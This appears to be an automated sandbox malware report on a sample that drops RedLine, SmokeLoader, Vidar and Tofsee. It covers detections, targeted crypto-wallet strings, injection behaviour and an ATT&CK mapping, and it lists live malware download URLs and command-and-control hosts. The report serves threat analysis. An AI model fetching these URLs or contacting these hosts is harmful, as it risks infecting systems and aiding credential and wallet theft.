                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 0000000C.00000002.543329250.0000028374902000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 31.2.8058.exe.412f910.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.8058.exe.412f910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002E.00000000.418486488.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.417444155.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.423233100.0000000004011000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.416967555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.417943982.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 23.2.6B9B.exe.6415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.0.6B9B.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.0.6B9B.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.1.6B9B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.1.ttfssdi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.ttfssdi.6015a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.6B9B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.GNXG5XLBEH.exe.6d15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.1.GNXG5XLBEH.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.GNXG5XLBEH.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.ttfssdi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.0.6B9B.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.375596550.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.375811349.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.354285300.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.303363186.0000000000470000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.354370443.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.288599943.00000000030E1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.303673269.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6BA5.exe PID: 1412, type: MEMORYSTR
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 45.2.svchost.exe.2ee0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.77CC.exe.2190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.2.svchost.exe.2ee0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.3.evjgtzc.exe.620000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.77CC.exe.2170e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.660000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.660000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.77CC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.77CC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.600e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002B.00000003.399149809.0000000000620000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.401571286.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.396801518.0000000002170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.402320315.0000000000660000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.395583768.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.552204136.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.371626952.0000000002190000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.402219986.0000000000600000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 77CC.exe PID: 5196, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: evjgtzc.exe PID: 4876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4020, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmpString found in binary or memory: ElectrumLTC
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmpString found in binary or memory: ElectronCash
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmpString found in binary or memory: Jaxx Liberty
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmpString found in binary or memory: info.seco
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmpString found in binary or memory: \Exodus\
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmpString found in binary or memory: ElectrumLTC
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmpString found in binary or memory: passphrase.json
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmpString found in binary or memory: \Ethereum\
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmpString found in binary or memory: Exodus
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmpString found in binary or memory: \Ethereum\
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmpString found in binary or memory: default_wallet
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmpString found in binary or memory: MultiDoge
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmpString found in binary or memory: seed.seco
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmpString found in binary or memory: keystore
                      Source: Yara matchFile source: 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6BA5.exe PID: 1412, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 31.2.8058.exe.412f910.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.8058.exe.412f910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002E.00000000.418486488.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.417444155.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.423233100.0000000004011000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.416967555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.417943982.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 23.2.6B9B.exe.6415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.0.6B9B.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.0.6B9B.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.1.6B9B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.1.ttfssdi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.ttfssdi.6015a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.6B9B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.GNXG5XLBEH.exe.6d15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.1.GNXG5XLBEH.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.GNXG5XLBEH.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.ttfssdi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.0.6B9B.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.375596550.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.375811349.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.354285300.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.303363186.0000000000470000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.354370443.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.288599943.00000000030E1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.303673269.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6BA5.exe PID: 1412, type: MEMORYSTR
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 45.2.svchost.exe.2ee0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.77CC.exe.2190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.2.svchost.exe.2ee0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.3.evjgtzc.exe.620000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.77CC.exe.2170e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.660000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.660000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.77CC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.77CC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.600e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002B.00000003.399149809.0000000000620000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.401571286.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.396801518.0000000002170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.402320315.0000000000660000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.395583768.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.552204136.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.371626952.0000000002190000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.402219986.0000000000600000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 77CC.exe PID: 5196, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: evjgtzc.exe PID: 4876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4020, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools311Input Capture1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API531Valid Accounts1Valid Accounts1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution1Windows Service14Access Token Manipulation1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesInput Capture1Automated ExfiltrationEncrypted Channel22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter3Logon Script (Mac)Windows Service14Software Packing43NTDSSystem Information Discovery237Distributed Component Object ModelInput CaptureScheduled TransferNon-Standard Port1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsService Execution3Network Logon ScriptProcess Injection713Timestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol4Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery581VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol35Jamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading131Proc FilesystemVirtualization/Sandbox Evasion241Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts1/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronVirtualization/Sandbox Evasion241Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection713KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                      Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskHidden Files and Directories1GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553366 Sample: GNXG5XLBEH.exe Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 84 86.107.197.138, 38133, 49902 MOD-EUNL Romania 2->84 86 yahoo.com 2->86 88 10 other IPs or domains 2->88 110 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->110 112 Multi AV Scanner detection for domain / URL 2->112 114 Antivirus detection for URL or domain 2->114 116 21 other signatures 2->116 11 GNXG5XLBEH.exe 2->11         started        13 evjgtzc.exe 2->13         started        16 ttfssdi 2->16         started        18 10 other processes 2->18 signatures3 process4 dnsIp5 21 GNXG5XLBEH.exe 11->21         started        158 Detected unpacking (changes PE section rights) 13->158 160 Detected unpacking (overwrites its own PE header) 13->160 162 Writes to foreign memory regions 13->162 168 2 other signatures 13->168 24 svchost.exe 13->24         started        164 Machine Learning detection for dropped file 16->164 27 ttfssdi 16->27         started        90 127.0.0.1 unknown unknown 18->90 166 Changes security center settings (notifications, updates, antivirus, firewall) 18->166 29 WerFault.exe 18->29         started        signatures6 process7 dnsIp8 140 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->140 142 Maps a DLL or memory area into another process 21->142 144 Checks if the current machine is a virtual machine (disk enumeration) 21->144 31 explorer.exe 12 21->31 injected 92 microsoft-com.mail.protection.outlook.com 52.101.24.0, 25, 49823 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 24->92 94 patmushta.info 94.142.143.116, 443, 49826 IHOR-ASRU Russian Federation 24->94 146 System process connects to network (likely due to code injection or exploit) 24->146 148 Creates a thread in another existing process (thread injection) 27->148 signatures9 process10 dnsIp11 96 185.233.81.115, 443, 49787 SUPERSERVERSDATACENTERRU Russian Federation 31->96 98 188.166.28.199, 80 DIGITALOCEAN-ASNUS Netherlands 31->98 100 11 other IPs or domains 31->100 72 C:\Users\user\AppData\Roaming\ttfssdi, PE32 31->72 dropped 74 C:\Users\user\AppData\Local\Temp\D9EC.exe, PE32 31->74 dropped 76 C:\Users\user\AppData\Local\Temp\8058.exe, PE32 31->76 dropped 78 14 other malicious files 31->78 dropped 102 System process connects to network (likely due to code injection or exploit) 31->102 104 Benign windows process drops PE files 31->104 106 Deletes itself after installation 31->106 108 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->108 36 6BA5.exe 31->36         started        39 77CC.exe 2 31->39         started        42 6B9B.exe 31->42         started        44 3 other processes 31->44 file12 signatures13 process14 file15 118 Detected unpacking (changes PE section rights) 36->118 120 Detected unpacking (overwrites its own PE header) 36->120 122 Found evasive API chain (may stop execution after checking mutex) 36->122 138 4 other signatures 36->138 80 C:\Users\user\AppData\Local\...\evjgtzc.exe, PE32 39->80 dropped 124 Machine Learning detection for dropped file 39->124 126 Uses netsh to modify the Windows network and firewall settings 39->126 128 Modifies the windows firewall 39->128 46 cmd.exe 39->46         started        49 cmd.exe 39->49         started        51 sc.exe 39->51         started        58 3 other processes 39->58 130 Contains functionality to inject code into remote processes 42->130 132 Injects a PE file into a foreign processes 42->132 53 6B9B.exe 42->53         started        134 Antivirus detection for dropped file 44->134 136 Multi AV Scanner detection for dropped file 44->136 56 WerFault.exe 23 9 44->56         started        signatures16 process17 file18 82 C:\Windows\SysWOW64\...\evjgtzc.exe (copy), PE32 46->82 dropped 60 conhost.exe 46->60         started        62 conhost.exe 49->62         started        64 conhost.exe 51->64         started        150 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 53->150 152 Maps a DLL or memory area into another process 53->152 154 Checks if the current machine is a virtual machine (disk enumeration) 53->154 156 Creates a thread in another existing process (thread injection) 53->156 66 conhost.exe 58->66         started        68 conhost.exe 58->68         started        70 conhost.exe 58->70         started        signatures19 process20

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      GNXG5XLBEH.exe36%VirustotalBrowse
                      GNXG5XLBEH.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\8058.exe100%AviraHEUR/AGEN.1211353
                      C:\Users\user\AppData\Local\Temp\evjgtzc.exe100%AviraTR/Crypt.XPACK.Gen
                      C:\Users\user\AppData\Local\Temp\4955.exe100%AviraHEUR/AGEN.1212012
                      C:\Users\user\AppData\Local\Temp\13C.exe100%AviraHEUR/AGEN.1212012
                      C:\Users\user\AppData\Local\Temp\8058.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\ttfssdi100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\74DE.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\2205.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\5BBC.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\77CC.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\evjgtzc.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\1523.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\6E36.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\D9EC.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\6B9B.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\6BA5.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\6471.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\54D0.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\2D8F.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\2205.exe34%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\2205.exe77%ReversingLabsWin32.Ransomware.StopCrypt
                      C:\Users\user\AppData\Local\Temp\2D8F.exe50%ReversingLabsWin32.Infostealer.Generic
                      C:\Users\user\AppData\Local\Temp\5BBC.exe46%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\5BBC.exe77%ReversingLabsWin32.Trojan.Raccoon

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      26.0.6B9B.exe.400000.0.unpack100%AviraHEUR/AGEN.1123244Download File
                      43.2.evjgtzc.exe.600e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      31.2.8058.exe.d00000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      26.0.6B9B.exe.400000.2.unpack100%AviraHEUR/AGEN.1123244Download File
                      26.0.6B9B.exe.400000.1.unpack100%AviraHEUR/AGEN.1123244Download File
                      31.0.8058.exe.d00000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                      23.2.6B9B.exe.6415a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      26.0.6B9B.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      28.2.6BA5.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.2.5BBC.exe.6e0e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.2.5BBC.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      31.0.8058.exe.d00000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                      19.0.ttfssdi.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      26.0.6B9B.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      45.2.svchost.exe.2ee0000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      30.3.77CC.exe.2190000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      21.0.5BBC.exe.6e0e50.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.0.ttfssdi.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      30.2.77CC.exe.2170e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      31.0.8058.exe.d00000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                      26.1.6B9B.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.1.ttfssdi.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      43.3.evjgtzc.exe.620000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      1.0.GNXG5XLBEH.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      26.0.6B9B.exe.400000.3.unpack100%AviraHEUR/AGEN.1123244Download File
                      1.0.GNXG5XLBEH.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.0.ttfssdi.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.0.5BBC.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.0.GNXG5XLBEH.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      28.2.6BA5.exe.7d0e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      26.2.6B9B.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      43.2.evjgtzc.exe.660000.2.unpack100%AviraBDS/Backdoor.GenDownload File
                      21.0.5BBC.exe.6e0e50.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      30.2.77CC.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      28.3.6BA5.exe.7f0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      21.3.5BBC.exe.6f0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.2.ttfssdi.6015a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.1.GNXG5XLBEH.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.2.GNXG5XLBEH.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.0.5BBC.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.2.ttfssdi.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.GNXG5XLBEH.exe.6d15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      31.0.8058.exe.d00000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      43.2.evjgtzc.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      26.0.6B9B.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://81.163.30.181/l2.exe100%Avira URL Cloudmalware
                      http://185.7.214.171:8080/6.php100%URL Reputationmalware
                      http://host-data-coin-11.com/0%URL Reputationsafe
                      http://data-host-coin-8.com/files/6961_1642089187_2359.exe17%VirustotalBrowse
                      http://data-host-coin-8.com/files/6961_1642089187_2359.exe100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/game.exe0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://unicupload.top/install5.exe100%URL Reputationphishing
                      http://crl.ver)0%Avira URL Cloudsafe
                      http://privacy-tools-for-you-780.com/downloads/toolspab3.exe100%Avira URL Cloudmalware
                      https://activity.windows.comr0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      http://data-host-coin-8.com/files/7729_1642101604_1835.exe100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/files/9030_1641816409_7037.exe100%Avira URL Cloudmalware
                      https://dynamic.t0%URL Reputationsafe
                      http://81.163.30.181/l3.exe100%Avira URL Cloudmalware
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      dl.uploadgram.me
                      		176.9.247.226
                      		truefalse
                        		high
                        patmushta.info
